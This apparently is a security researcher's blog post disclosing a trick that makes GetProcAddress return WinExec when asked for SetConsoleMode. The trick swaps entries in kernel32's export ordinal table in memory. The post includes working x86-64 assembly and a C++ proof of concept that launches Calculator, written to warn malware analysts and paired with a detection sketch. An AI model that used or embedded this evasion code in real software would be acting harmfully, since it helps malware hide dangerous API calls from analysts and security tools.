Deep Dive Into Windows PE Format - GetProcAddress Spoofing - Malware researchers - Beware of GetProcAddress spoofing via manipulation of PE format in memory.

Intro

Quite often malware authors choose not to use load-time linking to call Windows APIs. Instead they prefer to obfuscate those calls by loading and resolving API pointers dynamically. I wrote about it already in the preface to my previous blog post.

The idea is very simple, really. Let's take this code snippet:

C++

//Load the module
HMODULE hMod = ::LoadLibrary(L"kernel32.dll");

//Declare the function in it
BOOL (WINAPI *pfnSetConsoleMode)(HANDLE hConsoleHandle, DWORD dwMode);

//Resolve its pointer
(FARPROC&)pfnSetConsoleMode = ::GetProcAddress(hMod, "SetConsoleMode");

//Check if we actually got the function pointer
if(pfnSetConsoleMode)
{
	//And call the function (hConsole is assumed to be a console handle obtained earlier)
	BOOL bResult = pfnSetConsoleMode(hConsole, 1);
}

//Lastly unload the module
::FreeLibrary(hMod);

In the snippet above we load kernel32.dll with a call to LoadLibrary, declare the prototype of the function that we want to resolve (I took SetConsoleMode as an example), and resolve its address with GetProcAddress. We then check that we actually got the function pointer, call it, and finally do the obligatory clean-up.

As you can see, this involves quite a lot of steps, versus just doing this:

C++

BOOL bResult = SetConsoleMode(hConsole, 1);

For malware authors, though, the main benefit of the long method is obfuscation: the ability to hide system calls inside their module. Any time you use load-time linking, as in the short code sample above, the name of the API is placed into the module's import table, and thus calls to that API can be easily traced in a reverse-engineering tool (such as Ghidra, IDA, etc.).

By now most malware researchers are aware that APIs can be resolved dynamically via a call to GetProcAddress. They can track down all calls to that function and check its second parameter, lpProcName, for the presence of high-risk APIs (for instance, those that can download and run the actual payload of the malware). This usually helps them narrow the search by eliminating API calls that don't pose much of a security risk, such as the SetConsoleMode API that I showed above.

But let's see if that is really the case.

Below I will present my proof-of-concept (PoC), which demonstrates that relying on the name of the function passed into GetProcAddress is not enough to ensure that it actually returns a pointer to the function named in its second parameter, lpProcName.

GetProcAddress Spoof

The issue lies in the way a PE file is loaded (and mapped) into memory, and in the way GetProcAddress uses that mapping to resolve function pointers.

In a nutshell, GetProcAddress parses the PE header of the module specified in its first parameter, hModule, and looks the requested name up in that module's export table. The module must already be mapped into the memory of the process. So if we modify the mapped PE data of that module to replace some innocuous API with a high-risk one, a call to GetProcAddress for the former will return a pointer to the latter.
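
To make the lookup concrete, here is a minimal, portable sketch of a by-name export resolution and of what happens when two name-ordinal entries are exchanged. It is a toy model under stated assumptions, not the loader's actual code: `ToyExportTable`, `resolveByName`, `makeToyTable`, `swapNameOrdinals` and the RVA values are all hypothetical, the three vectors merely stand in for the AddressOfNames, AddressOfNameOrdinals and AddressOfFunctions arrays of the export directory, and a linear scan is used for brevity.

```cpp
#include <cstddef>
#include <cstdint>
#include <string>
#include <utility>
#include <vector>

// Hypothetical stand-in for the three parallel arrays of an export directory.
struct ToyExportTable {
    std::vector<std::string>   names;         // models AddressOfNames
    std::vector<std::uint16_t> nameOrdinals;  // models AddressOfNameOrdinals
    std::vector<std::uint32_t> functions;     // models AddressOfFunctions (RVAs)
};

// Name index -> ordinal index -> function RVA. Returns false if the name is not found.
bool resolveByName(const ToyExportTable& t, const std::string& name,
                   std::uint32_t& rvaOut) {
    for (std::size_t i = 0; i < t.names.size() && i < t.nameOrdinals.size(); ++i) {
        if (t.names[i] != name) continue;
        const std::uint16_t ordinal = t.nameOrdinals[i];
        if (ordinal >= t.functions.size()) return false;
        rvaOut = t.functions[ordinal];
        return true;
    }
    return false;
}

// Three exports with made-up RVAs.
ToyExportTable makeToyTable() {
    ToyExportTable t;
    t.names        = {"SetConsoleMode", "Sleep", "WinExec"};
    t.nameOrdinals = {0, 1, 2};
    t.functions    = {0x1000, 0x2000, 0x3000};
    return t;
}

// Exchange the ordinal entries of two names; the name and function arrays stay untouched.
void swapNameOrdinals(ToyExportTable& t, std::size_t a, std::size_t b) {
    std::swap(t.nameOrdinals[a], t.nameOrdinals[b]);
}
```

With the table from `makeToyTable()`, resolving "SetConsoleMode" yields 0x1000. After `swapNameOrdinals(t, 0, 2)` the very same lookup yields 0x3000, the RVA that belongs to WinExec in this model, even though the name passed in never changed.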

Let's review it in more detail.

A question for you: in the following example, is it always guaranteed that the pfnSetConsoleMode variable will point to the genuine SetConsoleMode function?

C++

HMODULE hMod = ::LoadLibrary(L"kernel32.dll");

BOOL (WINAPI *pfnSetConsoleMode)(HANDLE hConsoleHandle, DWORD dwMode);
(FARPROC&)pfnSetConsoleMode = ::GetProcAddress(hMod, "SetConsoleMode");

BOOL bResult = pfnSetConsoleMode(hConsole, 1);

::FreeLibrary(hMod);

I hope you said, "NO, absolutely not!"

Here's how one can spoof it.

PoC

First, LoadLibrary doesn't necessarily load the kernel32.dll module "fresh" in that instance. If earlier in the malware process the author called LoadLibrary on the same module and did not free it with a call to FreeLibrary, then any subsequent calls to LoadLibrary will not load it anew, and instead will simply reuse a previously mapped module.

Secondly, some modules are loaded into all non-native-system processes by default. Such modules are ntdll.dll and kernel32.dll, so you don't really need to call LoadLibrary/FreeLibrary on them, and instead you can get away with just calling GetModuleHandle.

My point here is that once a DLL is mapped into the process, we can modify its memory any way we like. We may just need to make that memory writable first using VirtualProtect. (Note that in this case we do not need any of the "PAGE_EXECUTE_*" protection flags that most malware researchers and anti-malware software will be zeroing in on.)

The next step is to parse the PE format of the loaded module and to locate the function's entry in its export table. In our example, we'll be using the SetConsoleMode function because it is truly innocuous, and in its pure form it does not pose any security threat. (I chose that function because it has the same number of parameters as the high-risk function that I want to spoof it with, WinExec. Moreover, the types of parameters that it takes are the same: the first one is a pointer and the second one is an integer.)

I wrote the spoof itself in assembly for x86-64. The gist is the following: we locate kernel32 in our process, walk through its PE header, and find its export table. Then we enumerate all of its functions exported by name, looking for SetConsoleMode and for WinExec. I specifically chose SetConsoleMode because it resides in the same module as the WinExec that I need. To find it, I used the WinAPI Search tool to enumerate all functions exported from kernel32.dll and checked their prototypes for call parameters matching those of WinExec.

Once we find both functions in the PE header, we adjust the memory protection for the page using VirtualProtect, and then swap their indices in the AddressOfNameOrdinals table of the PE header.

x86-64

extrn VirtualProtect : proc

.data
dummy	dd ?

.code

spoof_data PROC

	; INFO: Unoptimized assembly code to improve readability

	push    rsi
	push    rdi
	sub     rsp, 40h

	mov     rax, gs:[60h]		; PEB
	mov     rax, [rax + 18h]	; Ldr
	mov     rax, [rax + 20h]	; InMemoryOrderModuleList
	mov     rax, [rax]			; Skip our module and get to ntdll
	mov     rax, [rax]			; Skip ntdll and get to kernel32
	mov     rcx, [rax + 20h]	; rcx = DllBase for kernel32

	mov     eax, [rcx + 3Ch]	; e_lfanew
	add     rax, rcx			; rax = IMAGE_NT_HEADERS64
	lea     rax, [rax + 18h]	; rax = IMAGE_OPTIONAL_HEADER64
	lea     rax, [rax + 70h]	; rax = IMAGE_DATA_DIRECTORY
	lea     rax, [rax + 0h]		; rax = IMAGE_DATA_DIRECTORY for IMAGE_DIRECTORY_ENTRY_EXPORT

	mov     edx, [rax]			; rdx = VirtualAddress
	lea     rax, [rcx + rdx]	; rax = IMAGE_EXPORT_DIRECTORY

	mov     edx, [rax + 18h]	; rdx = NumberOfNames
	mov     r8d, [rax + 20h]	; r8 = AddressOfNames
	lea     r8, [rcx + r8]

	xor     rsi, rsi
	xor     rdi, rdi

	mov     r10, 6f736e6f43746553h	 ;	SetConso
	mov     r11, 0065646f4d656c6fh	 ;	oleMode\0

@@1:
	mov     r9d, [r8]
	lea     r9, [rcx + r9]		; function name

	; search for SetConsoleMode
	cmp     r10, [r9]
	jnz     @@2
	cmp     r11, [r9 + 7]
	jnz     @@2

	; prevent repeated matches (just in case)
	test    rsi, rsi
	jnz     @@bad

	; got it! remember the index
	mov     rsi, rdx
	neg     rsi

@@2:
	add     r8, 4
	dec     rdx
	jnz     @@1
	
	; Did we find our first function?
	test    rsi, rsi
	jz      @@bad

	mov     edx, [rax + 18h]	; rdx = NumberOfNames
	mov     r8d, [rax + 20h]	; r8 = AddressOfNames
	lea     r8, [rcx + r8]

@@3:
	mov     r9d, [r8]
	lea     r9, [rcx + r9]		; function name

	; Search for WinExec
	cmp     word ptr [r9], 6957h
	jnz     @@4
	cmp     byte ptr [r9 + 3], 45h
	jnz     @@4
	cmp     byte ptr [r9 + 7], 0
	jnz     @@4

	; prevent repeated matches (just in case)
	test    rdi, rdi
	jnz     @@bad

	; got it, remember the index
	mov     rdi, rdx
	neg     rdi

@@4:
	add     r8, 4
	dec     rdx
	jnz     @@3

	; Did we find our second function?
	test    rdi, rdi
	jz      @@bad


	; Convert the two indices that we found
	; to addresses in the AddressOfNameOrdinals array in the mapped PE file

	mov     r10d, [rax + 18h]	; r10 = NumberOfNames
	lea     rsi, [r10 + rsi]	; rsi = index in AddressOfNames: SetConsoleMode
	lea     rdi, [r10 + rdi]	; rdi = index in AddressOfNames: WinExec

	mov     r10d, [rax + 24h]	; r10 = AddressOfNameOrdinals
	lea     r10, [rcx + r10]

	lea     rsi, [r10 + rsi * 2]	; rsi = address of index of SetConsoleMode in the AddressOfNameOrdinals table
	lea     rdi, [r10 + rdi * 2]	; rdi = address of index of WinExec in the AddressOfNameOrdinals table

		
	; Change memory protection
	mov     rcx, rsi
	mov     rdx, 2
	mov     r8, 4				; 4 = PAGE_READWRITE
	lea     r9, dummy
	call    VirtualProtect
	test    rax, rax
	jz      @@bad

	; Just in case two addresses span to another page
	mov     rcx, rdi
	mov     rdx, 2
	mov     r8, 4				; 4 = PAGE_READWRITE
	lea     r9, dummy
	call    VirtualProtect
	test    rax, rax
	jz      @@bad


	; Swap WORD indices for two APIs
	mov     ax, word ptr [rsi]
	mov     cx, word ptr [rdi]
	mov     word ptr [rsi], cx
	mov     word ptr [rdi], ax


	; We can technically restore back the memory protection here ....


	; Success
	xor     eax, eax
	inc     rax

	add     rsp, 40h
	pop     rdi
	pop     rsi
	ret

@@bad:
	; Failure
	xor     eax, eax

	add     rsp, 40h
	pop     rdi
	pop     rsi
	ret
spoof_data ENDP

And that is it.
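
One detail of the assembly that is easy to miss is how the name index is recovered. The loop counts rdx down from NumberOfNames, stores the negated remaining count on a match, and later adds NumberOfNames back to obtain a zero-based index. The sketch below mirrors that arithmetic in portable C++ on a plain list of names; `findIndexByCountdown` is a hypothetical helper written for illustration only, not part of the PoC.

```cpp
#include <cstddef>
#include <string>
#include <vector>

// Mirrors the countdown loop of the assembly: returns the zero-based index of
// `wanted`, or -1 if it is missing or matched more than once.
long long findIndexByCountdown(const std::vector<std::string>& names,
                               const std::string& wanted) {
    const long long total = static_cast<long long>(names.size());
    long long saved = 0;          // plays the role of rsi/rdi (0 = not found yet)
    long long remaining = total;  // plays the role of rdx

    for (std::size_t i = 0; remaining != 0; ++i, --remaining) {
        if (names[i] != wanted) continue;
        if (saved != 0) return -1;  // repeated match, same as jumping to the failure path
        saved = -remaining;         // "mov rsi, rdx" followed by "neg rsi"
    }

    if (saved == 0) return -1;      // never found
    return total + saved;           // "lea rsi, [r10 + rsi]" with r10 = NumberOfNames
}
```

For four names and a match on the third one, the remaining count at the match is 2, the saved value is -2, and 4 + (-2) gives index 2. Because the remaining count is never zero inside the loop, a saved value of zero can safely double as the "not found" marker.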

After that all I need to do is to call GetProcAddress on SetConsoleMode and it will give me the pointer to WinExec. And because we can call our spoof_data anywhere in the code, we can do it very early on, way before we actually need to call GetProcAddress, which will obfuscate it even more.

For simplicity though, this is what my PoC looks like once we add the spoofing:

C++

#ifndef _M_X64
//I didn't want to make this post too long by providing a separate assembly function for x86. But it's quite doable there as well ...
#error This_POC_must_be_compiled_as_x64
#endif

int main()
{
	if(spoof_data())
	{
		HMODULE hMod = ::LoadLibrary(L"kernel32.dll");

		BOOL (WINAPI *pfnSetConsoleMode)(HANDLE hConsoleHandle, DWORD dwMode);
		(FARPROC&)pfnSetConsoleMode = ::GetProcAddress(hMod, "SetConsoleMode");

		ULONGLONG uiV = 0x0000000636c6163;
		BOOL bResult = pfnSetConsoleMode(&uiV, 1);	
		
		wprintf(L"You must see the Calculator now....\n");

		::FreeLibrary(hMod);
	}
	else
	{
		wprintf(L"ERROR: PoC failed...\n");
	}

	return 0;
}

The only thing to add here is how I'm calling pfnSetConsoleMode (which is in fact a pointer to WinExec). As you can see, I'm passing a pointer to the string calc in the first parameter. The string is ASCII-encoded in 0x0000000636c6163, whose little-endian layout in memory is the bytes 'c', 'a', 'l', 'c' followed by zero bytes. The second parameter is SW_SHOWNORMAL, or 1.

In normal circumstances, if you comment out the call to spoof_data, the call to pfnSetConsoleMode (then the genuine SetConsoleMode) will fail because the first parameter is not a console handle. That call only has meaning for the spoof.
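
The same packing trick is used for the 64-bit name constants in the assembly. As a small, portable sketch of how to decode such a constant, the hypothetical helper `littleEndianText` below lists the bytes of a value lowest byte first, which is how x86-64 lays them out in memory, and stops at the first zero byte.

```cpp
#include <cstdint>
#include <string>

// Returns the bytes of `value` in little-endian memory order (lowest byte
// first) as text, stopping at the first zero byte.
std::string littleEndianText(std::uint64_t value) {
    std::string out;
    for (int i = 0; i < 8; ++i) {
        const char c = static_cast<char>((value >> (8 * i)) & 0xFF);
        if (c == '\0') break;
        out.push_back(c);
    }
    return out;
}
```

Feeding it 0x636c6163 gives "calc", while the two constants from the assembly, 6f736e6f43746553h and 0065646f4d656c6fh, decode to "SetConso" and "oleMode". The shift-based extraction is a deliberate choice: it models the little-endian layout regardless of the machine the sketch is compiled on.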

Conclusion

I submitted this spoof to Microsoft Security Response Center on August 25, 2020, but they quickly brushed it off with the following response on August 28, 2020:

Hi Dennis,

Thank you for your submission. We determined your finding does not meet our bar for servicing. For more information, please see the Microsoft Security Servicing Criteria for Windows (https://aka.ms/windowscriteria).

An attacker that can modify binaries on a victim system has already achieved execution on that system.

Thank you for helping us protect our customers! For more information about our Security Development Lifecycle, please visit https://www.microsoft.com/en-us/sdl/default.aspx.

**Name-Redacted**
MSRC

Because I failed to convince the vendor to fix the issue, the purpose of this post is to alert security and malware researchers to the way a call to GetProcAddress can be spoofed, and thus cannot be relied upon.
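
For researchers who want to check a process for this kind of tampering, one possible approach is to compare the name-ordinal table of the mapped module against the same table read from a pristine copy of the DLL on disk. The sketch below is only an illustration of that comparison under stated assumptions: `findTamperedNames` is a hypothetical helper, and extracting the two tables (parsing the file, translating RVAs to file offsets, reading the live process) is assumed to have been done elsewhere.

```cpp
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

// Returns the export names whose name-ordinal entry in memory differs from the
// one in the on-disk image. All three vectors are indexed by name index.
std::vector<std::string> findTamperedNames(
        const std::vector<std::string>& names,
        const std::vector<std::uint16_t>& onDiskOrdinals,
        const std::vector<std::uint16_t>& inMemoryOrdinals) {
    std::vector<std::string> tampered;
    for (std::size_t i = 0; i < names.size(); ++i) {
        // A table that is too short counts as a mismatch for that name.
        if (i >= onDiskOrdinals.size() || i >= inMemoryOrdinals.size() ||
            onDiskOrdinals[i] != inMemoryOrdinals[i]) {
            tampered.push_back(names[i]);
        }
    }
    return tampered;
}
```

In the toy case of three names with on-disk ordinals {0, 1, 2} and in-memory ordinals {2, 1, 0}, the first and third names are reported. A real tool would also have to make sure that both copies come from the same build of the DLL before treating a difference as suspicious.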

Afterthought

Note that this blog post does not include a compilable code project, nor am I providing a GitHub link with the code. The idea is to prevent script kiddies from copying it one-to-one into their malware. I hope the reader of this blog can understand that. Anyone with sufficient knowledge of the PE format will immediately grasp the concept.